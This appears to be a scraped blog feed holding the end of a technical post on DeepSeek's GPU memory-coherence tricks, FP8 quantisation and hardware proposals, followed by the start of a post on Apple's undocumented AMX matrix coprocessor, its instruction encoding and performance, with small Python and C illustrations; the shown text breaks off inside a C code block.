<p>Meanwhile, on GPU 2, the reader thread tries to read this value using <code>__ldg(&amp;global_buffer[idx])</code>. The crucial point is that <code>__ldg</code> accesses memory through the texture cache, which is optimized for read-only data patterns. By design, the texture cache is not kept coherent with global memory writes from other threads or GPUs.</p>
<p>Even though the value has been updated in global memory, the reader's texture cache may still contain a stale value (say 0) from before the write occurred. The NVIDIA programming model doesn't guarantee that the texture cache will be automatically refreshed to see updates made by other threads or GPUs without explicit synchronization.</p>
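<p>The writer/reader scenario can be mimicked with a toy model in plain Python. This is only an analogy: <code>ToyNonCoherentCache</code> is a made-up class, and real GPU caches work on cache lines with far more involved rules. It does show the core issue, which is that a cache nobody invalidates keeps serving whatever it saw first.</p>

```python
class ToyNonCoherentCache:
    """Toy model of a read-only cache that is never invalidated by writes."""

    def __init__(self, memory):
        self.memory = memory  # stands in for global memory
        self.lines = {}       # cached copies, keyed by address

    def load_cached(self, addr):
        # Like a load through the non-coherent path: fill on a miss,
        # then keep serving the cached copy.
        if addr not in self.lines:
            self.lines[addr] = self.memory[addr]
        return self.lines[addr]

    def load_uncached(self, addr):
        # Like a load that never allocates a cache entry.
        return self.memory[addr]


global_buffer = {0: 0}
reader = ToyNonCoherentCache(global_buffer)

first = reader.load_cached(0)    # reader polls before the write arrives
global_buffer[0] = 42            # writer stores the value
stale = reader.load_cached(0)    # still served from the cache
fresh = reader.load_uncached(0)  # goes straight to memory
print(first, stale, fresh)
```

<p>The cached read keeps returning the old value after the write, while the read that skips the cache sees 42.</p>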
<p>CUDA uses a relaxed memory model where, without explicit synchronization, threads may see writes from other threads in an order different from what was executed. For most operations, developers use mechanisms like <code>__syncthreads()</code>, atomic operations, or memory fences to establish proper ordering.</p>
<p>For inter-GPU communication, which is DeepSeek's use case, memory ordering becomes even more complex. They use NVSHMEM (NVIDIA's implementation of OpenSHMEM) for communication.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Example of NVSHMEM put operation in internode.cu</span>
nvshmemx_int8_put_nbi_warp(rdma_channel_data.recv_buffer(rdma_rank) + rdma_slot_idx * num_bytes_per_rdma_token,
                           rdma_channel_data.send_buffer(dst_rdma_rank) + rdma_slot_idx * num_bytes_per_rdma_token,
                           num_bytes_per_rdma_token * num_chunked_tokens,
                           translate_dst_rdma_rank&lt;kLowLatencyMode&gt;(dst_rdma_rank, nvl_rank));
nvshmem_fence();
</code></pre>
<p>In this example, after this operation they need to read the data on the receiving GPU. If they use <code>__ldg</code> for these reads, they might get stale data from the texture cache even if the data has been properly transferred via NVSHMEM.</p>
<p>But DeepSeek discovered that using <code>ld.global.nc.L1::no_allocate.L2::256B</code> instead of the standard <code>ld.global.nc</code> instruction solves the coherency issue on Hopper architecture while maintaining performance benefits. Despite initially being called an “out-of-doc” instruction, this instruction is documented in NVIDIA's PTX ISA documentation.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740935064331/01578882-cc8f-47b4-8c9e-42a1007a183c.png" alt class="image--center mx-auto" /></p>
<p>The instruction's components:</p>
<ul>
<li><p><code>ld.global</code>: Loads data from the global memory space</p>
</li>
<li><p><code>.nc</code>: Uses a non-coherent cache for the load (typically the texture cache)</p>
</li>
<li><p><code>.L1::no_allocate</code>: Prevents the loaded data from being cached in L1 cache</p>
</li>
<li><p><code>.L2::256B</code>: Prefetches 256 bytes of data into the L2 cache</p>
</li>
</ul>
<pre><code class="lang-cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">ifndef</span> DISABLE_AGGRESSIVE_PTX_INSTRS</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LD_NC_FUNC <span class="hljs-meta-string">"ld.global.nc.L1::no_allocate.L2::256B"</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">else</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LD_NC_FUNC <span class="hljs-meta-string">"ld.volatile.global"</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span>

<span class="hljs-keyword">template</span> &lt;&gt;
<span class="hljs-function">__device__  __forceinline__ <span class="hljs-keyword">int</span> <span class="hljs-title">ld_nc_global</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> *ptr)</span> </span>{
    <span class="hljs-keyword">int</span> ret;
    <span class="hljs-function"><span class="hljs-keyword">asm</span> <span class="hljs-title">volatile</span><span class="hljs-params">(LD_NC_FUNC <span class="hljs-string">".s32 %0, [%1];"</span> : <span class="hljs-string">"=r"</span>(ret) : <span class="hljs-string">"l"</span>(ptr))</span></span>;
    <span class="hljs-keyword">return</span> ret;
}
</code></pre>
<p>The “undefined behavior” comes from using <code>ld.global.nc</code> to read volatile data. The <code>.nc</code> qualifier indicates that a non-coherent cache is used, which means the load operation might not see the most recent writes to the memory location. According to the PTX documentation, the texture cache (accessed via .nc) is designed for read-only data that doesn't change during a kernel's execution. Using it for volatile data (data that could be modified by other threads or processes) violates its intended use case.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740933986890/704b3ed2-c4f0-4a85-b584-92156e7a76e3.jpeg" alt class="image--center mx-auto" /></p>
<p>Using <code>.nc</code> alters the memory coherence behavior. By design, the non-coherent cache does not maintain coherence with other memory accesses. According to the PTX memory model documentation, loads via <code>.nc</code> (which uses the texture cache path) are not guaranteed to see updates made by normal global memory operations in a timely or consistent fashion. Within the same kernel execution, if one thread writes to a global memory address and another thread (or the same thread later) tries to read that address using <code>ld.global.nc</code>, the read might fetch a stale value from the non-coherent cache.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740932907425/5fa187d3-5dd2-4e61-829a-f92e19a41704.jpeg" alt class="image--center mx-auto" /></p>
<p>The underlying reason is that global L1 caches (and the texture cache) are <a target="_blank" href="https://stackoverflow.com/questions/72758469/can-cuda-atomic-operations-use-l1-cache#:~:text=,loads%20cached%20in%20L1">not coherent with each other for global memory updates</a>. Official documentation notes that global memory is coherent at the L2 level only; multiple SMs’ L1 caches are not kept coherent for global data. So if one SM writes to a location (bypassing or evicting from its L1) and another SM has that location cached in its texture/L1 cache, the second SM can read a stale cached value. The driver/hardware will invalidate such caches only between kernel launches, not within a single kernel.</p>
<p>But DeepSeek discovered that despite this violation, adding the <code>.L1::no_allocate</code> qualifier makes this work correctly on Hopper. Their hypothesis is that on Hopper, the non-coherent cache is unified with L1, and using <code>.L1::no_allocate</code> prevents any stale data from persisting in cache. By bypassing L1 cache, each load must fetch fresh data from either L2 cache or global memory.</p>
<p>This specialized instruction provides several significant performance advantages. The non-coherent cache typically offers higher bandwidth than the standard global memory cache path. The instruction also prefetches 256 bytes of data into the L2 cache, which significantly improves sequential access patterns. Furthermore, by avoiding L1 cache pollution for data that won't be reused, it preserves L1 cache capacity for other frequently accessed data.</p>
<h1 id="heading-where-deepseek-thinks-hardware-should-go">Where Deepseek Thinks Hardware Should Go</h1>
<p>When news of R1 went mainstream, it put investors into panic mode. But what R1 really shows is that DeepSeek found NVIDIA hardware can be pushed way further than US and Chinese labs have been pushing it. That only goes so far: they will run out of chips, and they will run out of clever tricks to pull with their current hardware. Given the pace at which the Chinese semiconductor industry is moving, coupled with the chokehold that NVIDIA’s CUDA has on the AI/ML industry, without new hardware that is going to happen soon.</p>
<p>This is easily found in their own paper (which I will assume in good faith all of you have read in full, not only snippets from Twitter you put into your bookmarks to never revisit ever again).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737923434733/1933eb4c-a296-4e8a-95ea-cc8b402cfc81.png" alt class="image--right mx-auto mr-0" /></p>
<p>But what is the “development of more advanced hardware” DeepSeek is looking for?</p>
<h2 id="heading-higher-fp8-gemm-accumulation-precision">Higher FP8 GEMM Accumulation Precision</h2>
<p>DeepSeek-V3's headline achievement is the first successful implementation of FP8 training at extreme scale (671B parameters), with a relative loss error below 0.25% compared to BF16 baselines. But FP8 GEMM operations on NVIDIA H800 GPUs currently retain only around 14 bits of accumulation precision, significantly below FP32. This becomes particularly problematic with large inner dimensions (K), which are common in large-scale model training where batch size and model width are increased. Their testing shows that GEMM operations with K=4096 can result in maximum relative errors approaching 2% due to limited accumulation precision in Tensor Cores.</p>
<p>They propose future hardware should either support full-precision accumulation in Tensor Cores or implement an appropriate accumulation bit-width based on training and inference accuracy requirements, eliminating the need for frequent data movement between Tensor and CUDA cores.</p>
<h2 id="heading-tile-and-block-wise-quantization">Tile and Block-Wise Quantization</h2>
<p>DeepSeek's tile and block-wise quantization strategy directly addresses the primary challenge of FP8 training: managing outliers in activations and weights that can destabilize training due to FP8's limited dynamic range. Their innovation applies different quantization strategies for activations versus weights. For activations, they implement 1x128 tile-wise grouping (per token per 128 channels), while weights use 128x128 block-wise grouping (per 128 input/output channels). This granular approach allows better accommodation of outliers by adapting scaling factors to smaller groups of elements.</p>
<p>A key aspect of their implementation is the introduction of per-group scaling factors along the inner dimension of GEMM operations. While this functionality isn't directly supported in standard FP8 GEMM, they combine it with their precise FP32 accumulation strategy for efficient implementation. Their approach aligns with emerging hardware trends, as NVIDIA's next-generation Blackwell GPUs <a target="_blank" href="https://www.youtube.com/watch?v=1vKPj7SXkwU">will support microscaling formats</a> with smaller quantization granularity.</p>
<h2 id="heading-transposed-gemm-operations">Transposed GEMM Operations</h2>
<p>DeepSeek's current architecture faces inefficiencies in matrix transposition operations during training. During forward pass, activations are quantized into 1x128 FP8 tiles and stored. The backward pass requires reading out these matrices, dequantizing them, transposing them, re-quantizing into 128x1 tiles, and storing in HBM. This multi-step process creates significant memory operation overhead.</p>
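<p>The reason a plain transpose is not enough is that the scaling groups themselves change shape. A minimal sketch with a tiny matrix and a group size of 2 instead of 128 (the helper <code>group_amax</code> and the values are hypothetical) shows that the forward and backward layouts need different sets of scales:</p>

```python
def group_amax(matrix, group_rows, group_cols):
    """Max |x| of each group_rows x group_cols tile (the FP8 scale is this divided by 448)."""
    n_rows, n_cols = len(matrix), len(matrix[0])
    assert n_rows % group_rows == 0 and n_cols % group_cols == 0
    return [
        [
            max(
                abs(matrix[r][c])
                for r in range(r0, r0 + group_rows)
                for c in range(c0, c0 + group_cols)
            )
            for c0 in range(0, n_cols, group_cols)
        ]
        for r0 in range(0, n_rows, group_rows)
    ]


# Rows are tokens, columns are channels.
activations = [[1, 2, 3, 4],
               [8, 6, 4, 2]]

forward_groups = group_amax(activations, 1, 2)   # 1 x g tiles, as in the forward pass
backward_groups = group_amax(activations, 2, 1)  # g x 1 tiles, as in the backward pass
print(forward_groups)
print(backward_groups)
```

<p>The two groupings produce different maxima, so values quantized with the forward scales cannot simply be reinterpreted under the backward grouping. That is why the data is dequantized and re-quantized along the way.</p>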
<p>They propose enabling direct transposed reads of matrices from shared memory before MMA operations for precisions required in both training and inference. When combined with their proposed fusion of FP8 format conversion and TMA access, this would eliminate the current need for multiple memory operations and re-quantization steps. The optimization would be particularly impactful for their mixed-precision training framework where multiple matrix transformations are required between forward and backward passes.</p>
<h2 id="heading-dedicated-inter-gpu-link-co-processors">Dedicated Inter-GPU Link Co-Processors</h2>
<p>The need for specialized co-processors to handle inter-GPU communications arises from their current requirement to dedicate 20 out of 132 Streaming Multiprocessors (SMs) solely for communication tasks in their distributed MoE architecture. These SMs manage a complex communication system spanning InfiniBand for inter-node and NVLink for intra-node communication. This system, while effective, represents a 15% reduction in available computing power that could otherwise be used for model training.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737924821509/78633f1d-08db-4bff-85d3-2b64bd110349.png" alt class="image--center mx-auto" /></p>
<p>A specialized co-processor would unify these networking domains, similar to <a target="_blank" href="https://network.nvidia.com/pdf/solutions/hpc/paperieee_copyright.pdf">NVIDIA's Scalable Hierarchical Aggregation Protocol (SHARP)</a>, which serves as a network co-processor (currently found inside certain Mellanox InfiniBand switches, yes, <strong>network switches</strong>).</p>
<p>The co-processor could provide a unified interface for read, write, multicast, and reduce operations across the entire IB-NVLink-unified domain while maintaining near-zero all-to-all communication overhead. This would be particularly crucial for maintaining efficiency in their MoE architecture, where each token must be routed to up to 4 nodes without blocking subsequent token operations.</p>
<h1 id="heading-conclusions">Conclusions</h1>
<p>A lot has been said on both sides of this discussion: China is on the rise and the West has fallen. But almost all of the methods that DeepSeek uses are built upon research done by Western teams, and its models were trained on American technology. If DeepSeek had used <a target="_blank" href="https://www.zhihu.com/question/596309547/answer/3184526430">Huawei Ascend chips</a>, I’d be singing a different tune.</p>
<p>I don’t understand why people thought this <a target="_blank" href="https://www.reuters.com/technology/chinas-deepseek-sets-off-ai-market-rout-2025-01-27/">punctured NVIDIA’s dominance</a>. PTX has public ISA documentation, and some of the optimization methods are not entirely alien. People think hardware and compilers are now so fast that doing low-level optimizations is no longer worth it, when <a target="_blank" href="https://arxiv.org/pdf/1804.06826">we know this is not the case</a>.</p>
<p>People think that DeepSeek somehow discovered PTX and can now bypass “NVIDIA’s CUDA Monopoly”, when the PTX ISA is a domain-specific compiler IR that connects high-level CUDA C++ code with low-level GPU SASS instructions. These low-level code optimizations are not portable to AMD or even Huawei Ascend cards, as they run entirely different architectures. NVIDIA obscures their hardware's actual implementation details, even in absurd ways like how technical diagrams in <a target="_blank" href="https://images.nvidia.com/aem-dam/Solutions/geforce/blackwell/nvidia-rtx-blackwell-gpu-architecture.pdf">NVIDIA’s technical documents</a> only aim to explain the general structure of the architecture and may not accurately depict the exact implementation details of the hardware.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738411150000/0be46a7c-a64c-47b3-a42b-2d154d509c47.png" alt class="image--center mx-auto" /></p>
<p>This is genius on NVIDIA’s part, because it means firms either have to invest in low-level engineers who dig through these GPUs in order to fully utilize them, or buy more chips. In scenario one, firms spend precious time and resources hyper-optimizing their code for NVIDIA’s stack, which cements the vendor lock-in. In scenario two, NVIDIA gets more money from batch orders. NVIDIA wins either way.</p>
<p>Most of the people talking about DeepSeek on Twitter only saw the benchmarks or small snippets of the paper and jizzed themselves over the LaTeX math formulas, pretending they understood a single word of what was being discussed. DeepSeek did what American teams didn’t: they don’t leave papers in their bookmarks.</p>
<p>The conclusion is, less bookmarking and more reading, please.</p>
]]></content:encoded></item><item><title><![CDATA[The Elusive Apple Matrix Coprocessor (AMX)]]></title><description><![CDATA[Cover Illustration by ochxzuke

I was heading for a trip over the weekends where i would be far from my main workstation, and at this time i was looking to continue my current run of Persona 5 Royal on the PC. Recently with the launch of MacOS Sonoma...]]></description><link>https://research.meekolab.com/the-elusive-apple-matrix-coprocessor-amx</link><guid isPermaLink="true">https://research.meekolab.com/the-elusive-apple-matrix-coprocessor-amx</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Mon, 30 Dec 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1732452538868/6ee3bd61-0e7c-429e-a51e-72b0febfcb82.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by ochxzuke</em></strong></p>
</blockquote>
<p>I was heading out on a weekend trip where I would be far from my main workstation, and at the time I wanted to continue my current run of Persona 5 Royal on PC. Recently, with the launch of macOS Sonoma, Apple added support for translating AVX2 instructions through <a target="_blank" href="https://developer.apple.com/games/game-porting-toolkit/#:~:text=The%20latest%20version,Increased%20performance.">Game Porting Toolkit 2</a>.</p>
<p>But I quickly found that while there are translations for AVX2 instructions, they’re not very good. Many AVX2 instructions are mapped to ARM NEON equivalents, and NEON has a relatively limited and less flexible instruction set compared to x86 counterparts like Intel’s AVX2. NEON lacks certain advanced operations, such as comprehensive shuffle and permutation instructions, which are readily available in AVX.</p>
<p>While Rosetta emulates other Intel SIMD technologies like SSE super fast, it skips over support for AVX because the <a target="_blank" href="https://patents.google.com/patent/US20140297991A1/en">patent for AVX</a> is still valid, which Intel is very eager to remind <a target="_blank" href="https://web.archive.org/web/20220405065430/https://newsroom.intel.com/editorials/x86-approaching-40-still-going-strong/#gs.elvle9:~:text=However%2C%20there%20have,10%20years%20ago.">its competitors about</a>. Emulating the Intel ISA without authorization would likely land Apple in legal trouble, which is why they would likely need to license the ISA in order to incorporate it into Rosetta.</p>
<p>This is why workarounds often involve translating one AVX instruction into a multi-step sequence of NEON instructions to achieve what AVX can accomplish with a single operation, creating bottlenecks in translation speed. This is where I fell into a rabbit hole of ARM NEON performance on macOS and the mysterious Apple Matrix Extensions (AMX) coprocessor.</p>
<h1 id="heading-brief-history-of-amx">Brief history of AMX</h1>
<p>In 2019, at Apple’s fall keynote introducing new iPads, Apple Watches, and iPhones, there was a brief 30-second moment on stage where they introduced a new co-processor inside the A13 Bionic chip. What was vaguely called “Machine Learning Accelerators” added two SIMD units that perform accelerated matrix operations to the CPU, which Apple claimed increased the matrix multiplication performance of the A13 Bionic by 6 times and allowed the CPU to achieve one trillion operations per second.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1727019243431/7fe08870-a17f-4c00-ac64-a2190aaedc7d.png" alt class="image--center mx-auto" /></p>
<p>Many thought that this was an addition to the Apple Neural Engine (ANE) accelerators previously introduced in the A11 Bionic, but it seems these dedicated accelerators are separate from the ANE.</p>
<p>The Apple Matrix Coprocessor (AMX) operates as a specialized coprocessor that interfaces directly with the instruction stream rather than functioning as a discrete accelerator. Unlike traditional accelerators such as GPUs or Apple's Neural Engine, AMX implements instruction stream monitoring capabilities, allowing it to intercept and process specific matrix operations embedded within the standard instruction flow.</p>
<p>The AMX's implementation diverges from conventional accelerator designs by eliminating the need for explicit memory management and instruction queue population typically associated with GPU-style accelerators. This design choice significantly reduces operational overhead, particularly beneficial for smaller matrix computations where traditional accelerator setup costs would be prohibitive. The coprocessor achieves this efficiency by monitoring the instruction cache feed to the CPU cores, identifying and intercepting matrix-specific instructions for specialized processing.</p>
<p>From an instruction set architecture (ISA) perspective, the AMX represents a non-standard extension to ARM's base instruction set. This implementation required special dispensation from ARM Ltd., which historically restricted custom instruction set extensions until their 2019 policy revision. The AMX instructions are interleaved with standard ARM instructions but remain undocumented in official specifications, accessible primarily through Apple's Accelerate framework components including vImage, BLAS, BNNS, vDSP, and LAPACK.</p>
<p>Performance analysis conducted by <a target="_blank" href="https://web.archive.org/web/20230329074003/https://nod.ai/comparing-apple-m1-with-amx2-m1-with-neon/">Nod Labs</a> (now acquired by AMD) demonstrates that AMX achieves approximately twice the computational throughput compared to ARM's native NEON SIMD instructions for matrix operations. This performance differential is particularly significant for machine learning workloads and high-performance computing applications that heavily utilize matrix computations. The coprocessor's efficiency stems from its tight integration with the CPU's instruction pipeline, enabling lower-latency operation compared to discrete accelerators.</p>
<h1 id="heading-technicals">Technicals</h1>
<p>These cores are more commonly known as AMX, a set of undocumented arm64 ISA extensions present on Apple Silicon chips. In the M-series chips, the class of Apple Silicon processors for desktop use, the number of AMX cores was bumped from 2 to 4. These instructions have been reverse-engineered by <a target="_blank" href="https://gist.github.com/dougallj/7a75a3be1ec69ca550e7c36dc75e0d6f">Dougall Johnson</a>.</p>
<p>Thanks to <a target="_blank" href="https://patents.google.com/patent/US20180074824A1/en">abandoned patent US20180074824A1</a> from Apple we can see that <a target="_blank" href="https://patents.google.com/patent/US20180074824A1/en">the AMX instructions operate</a> on a 32x32 grid of compute units. Each unit is capable of performing 16-bit multiply-accumulate operations. The architecture allows for flexibility in data width, as 2x2 subgrids of units can perform 32-bit multiply-accumulate operations, and 4x4 subgrids can handle 64-bit multiply-accumulate operations. To feed this computational grid, AMX utilizes a pool of X registers and a pool of Y registers. Each of these registers contains 32 16-bit elements, 16 32-bit elements, or 8 64-bit elements. This structure enables a single instruction to perform a full outer product operation, multiplying every element of an X register with every element of a Y register and accumulating the results with the corresponding Z element.</p>
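<p>To make the outer-product step concrete, here is a plain C model of what a single 32-bit multiply-accumulate instruction would compute, assuming 16 f32 elements per X and Y register and a 16x16 accumulator tile. The name <code>outer_product_accumulate</code> and the choice of indexing Z rows by the Y element are illustrative assumptions; the hardware does this in one instruction rather than 256 scalar multiply-adds.</p>

```c
#include <assert.h>
#include <stddef.h>

#define LANES 16 /* f32 elements in one 64-byte X or Y register */

/* z[j][i] += x[i] * y[j] for every pair (i, j): a full outer product
 * accumulated onto the existing contents of z. */
static void outer_product_accumulate(float z[LANES][LANES],
                                     const float x[LANES],
                                     const float y[LANES])
{
    assert(z != NULL && x != NULL && y != NULL);
    for (size_t j = 0; j < LANES; j++) {
        for (size_t i = 0; i < LANES; i++) {
            z[j][i] += x[i] * y[j];
        }
    }
}
```

<p>Calling it repeatedly with successive columns of one matrix and rows of another accumulates a 16x16 block of their product, which is the pattern the kernels later in this post rely on.</p>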
<p>The AMX architecture supports various data types for computation. It can handle IEEE754 floating-point numbers in f16, f32, or f64 formats, with the same width used for all three operands in fused-multiply-add operations. Additionally, it supports operations using f16 multiplicands while accumulating onto f32. Integer operations are also supported, with 8-bit or 16-bit multiplicands accumulating onto 16 or 32 bits in various signedness configurations. The M2 hardware introduced support for bfloat16 (bf16) multiplicands, which can accumulate onto either bf16 or IEEE754 f32.</p>
<p>While the A-series chips contained version 1 (marked by the existence of 7-bit writemasks), the M1 chip is believed to contain version 2 of the AMX instructions that contained 9-bit writemasks instead. The transition from M1 to M2 brought <code>bf16</code> support along with other minor adjustments. The M2 to M3 transition further expanded capabilities by adding an extra mode to each of the <code>ldx</code>, <code>ldy</code>, and <code>matint</code> instructions.</p>
<p>The AMX coprocessor's state comprises two 0x200-byte registers, amx0 ("x") and amx1 ("y"), and one 0x1000-byte register, amx2 ("z"). Apple's documentation describes x, y, and z as register groups, with each 64-byte row considered a "register". The z register group is specifically described as "64 registers in an M-by-N matrix". Additionally, AMX configuration happens at the level of the AMX_CONFIG_EL1/EL12/EL2/EL21 registers, with AMX_STATE_T_EL1 and AMX_CONTEXT_EL1 also being present.</p>
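<p>One way to keep these sizes straight is to mirror the register file in a C struct. This is only a software model for reasoning about layout; the type and field names are invented for the sketch and do not come from Apple.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Software mirror of the AMX register state described above.
 * Each 64-byte row is one "register" within its group. */
typedef struct {
    uint8_t x[8][64];  /* amx0: 0x200 bytes, 8 rows of 64 bytes */
    uint8_t y[8][64];  /* amx1: 0x200 bytes, 8 rows of 64 bytes */
    uint8_t z[64][64]; /* amx2: 0x1000 bytes, 64 rows of 64 bytes */
} amx_state_model;

/* Compile-time checks that the model matches the stated sizes. */
static_assert(sizeof(((amx_state_model *)0)->x) == 0x200, "x group is 0x200 bytes");
static_assert(sizeof(((amx_state_model *)0)->y) == 0x200, "y group is 0x200 bytes");
static_assert(sizeof(((amx_state_model *)0)->z) == 0x1000, "z group is 0x1000 bytes");
```

<p>Taken together that is 0x1400 bytes (5 KiB) of architectural state per core, which is worth keeping in mind when thinking about context switches.</p>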
<p>AMX instructions follow a specific format:</p>
<pre><code class="lang-c"><span class="hljs-number">0x00201000</span> | ((op &amp; <span class="hljs-number">0x1F</span>) &lt;&lt; <span class="hljs-number">5</span>) | (operand &amp; <span class="hljs-number">0x1F</span>)
</code></pre>
<p>The coprocessor must be explicitly enabled using op=17, operand=0 and disabled using op=17, operand=1. In the Accelerate framework, these instructions are consistently prefixed by three NOPs. Executing non-enable instructions when AMX is disabled results in illegal instruction exceptions.</p>
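<p>The encoding above is simple enough to write as a helper. The sketch below only builds the 32-bit instruction word; it does not execute anything, and the function names are hypothetical.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Build the 32-bit instruction word for an AMX op and its 5-bit operand. */
static uint32_t amx_encode(uint32_t op, uint32_t operand)
{
    assert(op < 32 && operand < 32); /* both fields are 5 bits wide */
    return 0x00201000u | ((op & 0x1Fu) << 5) | (operand & 0x1Fu);
}

/* op 17 toggles the coprocessor: operand 0 enables it, operand 1 disables it. */
static uint32_t amx_encode_enable(void)  { return amx_encode(17, 0); }
static uint32_t amx_encode_disable(void) { return amx_encode(17, 1); }
```

<p>With this encoding the enable instruction comes out as <code>0x00201220</code> and the disable instruction as <code>0x00201221</code>.</p>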
<p>Most AMX operations (op=0-16 and op=18-22) use the 5-bit operand field to name a 64-bit general-purpose register (X0-X30, or 31 for XZR). This register typically contains a bitfield with additional operation parameters. For instance, load and store operations use a 56-bit address in bits 0-55, a register offset (in 0x40-byte units) in bits 56-61, and a flag in bit 62 (0 for 0x40-byte operations, 1 for 0x80-byte aligned operations). Z loads and stores use all six offset bits to pick one of the 64 rows, while X and Y only need the low three bits for their 8 rows.</p>
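<p>The load/store operand layout can be sketched as a pack/unpack pair. This is a portable model of the bitfield only, with macro and function names made up for the example; the offset field is treated as the full bits 56-61 range.</p>

```c
#include <assert.h>
#include <stdint.h>

#define AMX_ADDR_MASK ((1ull << 56) - 1) /* bits 0-55: memory address */
#define AMX_REG_SHIFT 56                 /* register offset starts at bit 56 */
#define AMX_REG_MASK  0x3Full            /* bits 56-61 */
#define AMX_PAIR_BIT  62                 /* 0: 0x40 bytes, 1: 0x80 bytes */

/* Pack an address, register offset and size flag into one 64-bit operand. */
static uint64_t amx_pack_ldst(uint64_t addr, uint64_t reg, uint64_t pair)
{
    assert(reg <= AMX_REG_MASK && pair <= 1);
    return (addr & AMX_ADDR_MASK) | (reg << AMX_REG_SHIFT) | (pair << AMX_PAIR_BIT);
}

/* Field accessors, useful when decoding operands seen in a disassembly. */
static uint64_t amx_ldst_addr(uint64_t operand) { return operand & AMX_ADDR_MASK; }
static uint64_t amx_ldst_reg(uint64_t operand)  { return (operand >> AMX_REG_SHIFT) & AMX_REG_MASK; }
static uint64_t amx_ldst_pair(uint64_t operand) { return (operand >> AMX_PAIR_BIT) & 1; }
```

<p>Because the address shares a register with the control bits, the top byte of the pointer is masked off before the other fields are OR-ed in.</p>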
<p>The AMX instruction set includes various operations:</p>
<ol>
<li><p>Load/store operations (ops 0-7)</p>
</li>
<li><p>Extract and move operations (ops 8-9)</p>
</li>
<li><p>Floating-point multiply-add operations (ops 10-13, 15-16)</p>
</li>
<li><p>Integer multiply-add operations (op 14)</p>
</li>
<li><p>Vector and matrix operations (ops 18-21)</p>
</li>
<li><p>Lookup table generation (op 22)</p>
</li>
</ol>
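<p>The opcode ranges in the list above map naturally onto a small classifier, which can be handy when annotating disassembly. The enum and function names are hypothetical; op 17 is included as the enable/disable instruction described earlier.</p>

```c
#include <assert.h>

typedef enum {
    AMX_CLASS_LOAD_STORE,     /* ops 0-7 */
    AMX_CLASS_EXTRACT_MOVE,   /* ops 8-9 */
    AMX_CLASS_FLOAT_FMA,      /* ops 10-13, 15-16 */
    AMX_CLASS_INT_FMA,        /* op 14 */
    AMX_CLASS_ENABLE_DISABLE, /* op 17 */
    AMX_CLASS_VECTOR_MATRIX,  /* ops 18-21 */
    AMX_CLASS_LUT,            /* op 22 */
    AMX_CLASS_UNKNOWN         /* anything else */
} amx_op_class;

/* Classify a 5-bit AMX opcode according to the groups listed above. */
static amx_op_class amx_classify(unsigned op)
{
    assert(op < 32); /* the op field is 5 bits wide */
    if (op <= 7)  return AMX_CLASS_LOAD_STORE;
    if (op <= 9)  return AMX_CLASS_EXTRACT_MOVE;
    if (op == 14) return AMX_CLASS_INT_FMA;
    if (op <= 16) return AMX_CLASS_FLOAT_FMA;
    if (op == 17) return AMX_CLASS_ENABLE_DISABLE;
    if (op <= 21) return AMX_CLASS_VECTOR_MATRIX;
    if (op == 22) return AMX_CLASS_LUT;
    return AMX_CLASS_UNKNOWN;
}
```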
<p>The AMX instruction set includes LDX/LDY for loading data, FMA for multiply-accumulate operations, and LDZ/STZ for loading and storing results. The FMA instruction operates in two modes: Matrix Mode for outer product computations and Vector Mode for inner product calculations. The outer product mode offers higher hardware parallelism compared to the inner product mode.</p>
<p>The z register group occupies 0x1000 bytes (4096 bytes) of state. This larger group is divided into 64 registers, each also being 64 bytes wide. The z group is primarily used to store the results of operations performed on the x and y registers. This arrangement means that outer product results are not stored contiguously in registers, which has implications for how data is accessed and processed.</p>
<p>AMX's performance characteristics are noteworthy. It can achieve different levels of parallelism depending on how many Arithmetic Logic Units (ALUs) are enabled. Tests show that enabling all 4 ALUs can reach up to 2k GFLOP/s, demonstrating that ALUs can execute in parallel even when configured and emitted individually.</p>
<p>Load performance varies based on factors such as whether data is loaded into X and Y registers simultaneously, whether memory accesses are consecutive, and how many registers are used for reading. The highest bandwidth (219.201 GB/s) was achieved when loading 4 registers each from X and Y simultaneously with consecutive memory access.</p>
<p>Store performance is generally slower than compute and load operations, indicating that frequent loading and storing of Z registers should be avoided for optimal performance. The maximum bandwidth achieved for store operations was around 13 GB/s.</p>
<p>When designing kernels to leverage AMX, it's crucial to balance computation and data loading. One effective strategy involves loading 2 groups each of M and N data, allowing for 8 computation cycles that maximize ALU utilization. This approach allows for streaming computation, achieving near-peak performance.</p>
<p>Performance-wise, AMX functions as a non-speculative coprocessor, with operations posted via the CPU cores' store units. The M1 chip features two AMX coprocessors: one for the four Firestorm cores and another for the four Icestorm cores. Each coprocessor maintains four copies of the architectural register state, one per core. They access memory through the same L2 cache as the cores and operate at similar clock speeds.</p>
<p>The performance variant of AMX consists of an array of 4-cycle latency, pipelined FMAs, achieving a throughput of one FMA32 or FMA64 instruction per cycle, but only one FMA16 instruction every two cycles. The efficiency variant maintains the 4-cycle FMA32/FMA64 latency but performs one FMA32 or FMA64 instruction every four cycles, or one FMA16 instruction every eight cycles.</p>
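<p>These issue rates translate into a back-of-the-envelope peak throughput. The sketch assumes one FMA32 instruction covers a 16x16 grid of multiply-adds (and one FMA16 a 32x32 grid), counts each fused multiply-add as 2 FLOPs, and takes the clock as a parameter because no clock frequency is given here. The helper name is hypothetical.</p>

```c
#include <assert.h>

/* Peak GFLOP/s for one AMX unit.
 * lanes:            elements per X/Y register for the data width (16 for f32, 32 for f16)
 * cycles_per_instr: cycles between issued FMA instructions (1, 2, 4 or 8 per the text above)
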